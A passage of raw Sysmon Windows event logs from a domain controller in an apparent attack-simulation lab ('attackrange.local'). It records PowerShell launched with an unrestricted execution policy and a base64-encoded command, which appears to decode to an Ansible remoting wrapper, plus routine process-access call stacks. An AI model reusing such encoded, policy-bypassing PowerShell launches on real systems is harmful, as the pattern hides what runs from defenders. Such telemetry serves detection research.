istrator{10ACEC4A-8518-5FCF-7490-100000000000}0x1090740HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8518-5FCF-CB02-000000009001}1184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x8000000000000000221Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.462{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-8518-5FCF-CB02-000000009001}1184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.462{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-8518-5FCF-CB02-000000009001}1184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000219Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.431{10ACEC4A-8518-5FCF-CB02-000000009001}1184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qoobnedc.sk1.ps12020-12-08 13:52:24.431 10341000x8000000000000000218Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.415{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8518-5FCF-CB02-000000009001}1184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-8518-5FCF-C902-000000009001}26962900C:\Windows\system32\conhost.exe{10ACEC4A-8518-5FCF-CB02-000000009001}1184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-83AA-5FCF-0500-000000009001}640656C:\Windows\system32\csrss.exe{10ACEC4A-8518-5FCF-CB02-000000009001}1184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.384{10ACEC4A-8518-5FCF-CA02-000000009001}25085020C:\Windows\system32\cmd.exe{10ACEC4A-8518-5FCF-CB02-000000009001}1184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:24.394{10ACEC4A-8518-5FCF-CB02-000000009001}1184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBj